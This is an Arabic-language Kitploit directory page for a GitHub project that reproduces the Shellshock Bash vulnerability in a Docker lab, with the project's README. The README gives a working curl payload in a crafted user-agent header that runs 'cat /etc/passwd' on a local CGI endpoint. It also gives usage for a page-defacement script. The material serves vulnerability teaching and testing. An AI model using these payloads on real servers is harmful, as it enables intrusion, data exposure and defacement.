Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2014-6271 — مشروع عرض CVE (ShellShock) مع pdf، عرض تقني وقابل للتكرار | Kitploit
أدوات/GitHubGitHub/radyio/cve-2014-6271
أمن الحاوياتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubradyio/cve-2014-6271

CVE-2014-6271

مشروع عرض CVE (ShellShock) مع pdf، عرض تقني وقابل للتكرار

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الموقع الإلكتروني

CVE-2014-6271

الوصف

يتيح هذا المشروع إعادة إنتاج الثغرة الأمنية CVE-2014-6271، المعروفة أيضًا باسم Shellshock. شيلشوك هي ثغرة أمنية في Bash تسمح بتنفيذ كود ضار عبر متغيرات البيئة.

الهدف من هذا المشروع هو إظهار تأثير هذه الثغرة على بيئة Docker.

المتطلبات الأساسية

قبل البدء، تأكد من تثبيت Docker على جهازك. يمكنك تنزيل Docker هنا.

التثبيت والتشغيل

1. بناء صورة Docker

في مجلد المشروع، قم ببناء صورة Docker بتنفيذ الأمر التالي:

root@kitploit:~
docker build -t ['image name'] .

استبدل ['image name'] بالاسم الذي ترغب في إعطائه لصورة Docker.

2. تشغيل حاوية Docker

بمجرد بناء الصورة، قم بتشغيل حاوية باستخدام هذه الصورة بالأمر التالي:

root@kitploit:~
docker run -it --rm -p 8080:80 ['image name']

سيؤدي ذلك إلى عرض الخدمة على المنفذ 8080 على جهازك المحلي.

3. الوصول إلى التطبيق

افتح متصفحك وانتقل إلى http://localhost:8080. ستتمكن من ملاحظة سلوك التطبيق واختبار الثغرة.

4-1. استغلال الثغرة

في محطة طرفية أخرى، نفذ الأمر التالي لاستغلال الثغرة وقراءة محتوى الملف /etc/passwd:

root@kitploit:~
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \
http://localhost:8080/cgi-bin/vulnerable

يُرسل هذا الأمر رأس user-agent مصممًا خصيصًا لاستغلال شيلشوك. إذا تم إعادة إنتاج الثغرة بشكل صحيح، فسيظهر محتوى /etc/passwd في مخرجات المحطة الطرفية.

4-2. استغلال الثغرة (نص exp_deface.sh)

يتيح هذا النص استغلال الثغرة لتشويه صفحة ويب مستهدفة. تعتمد الثغرة على تكوين خاطئ لبرامج CGI النصية، مما يسمح بتنفيذ أوامر عشوائية على الخادم.

المتطلبات: تأكد من أن الهدف معرض لخطأ ShellShock. تأكد من أن لديك الأذونات اللازمة لاختبار الاستغلال على هذا الهدف.

root@kitploit:~
./exp_deface.sh <ip> <port>

./exp_deface.sh localhost 8080

الأمان

هام: يجب استخدام هذه الثغرة فقط لأغراض الاختبار والعرض التوضيحي في بيئة خاضعة للرقابة. لا تستخدم هذا المشروع في بيئات الإنتاج.

تنزيل الأداة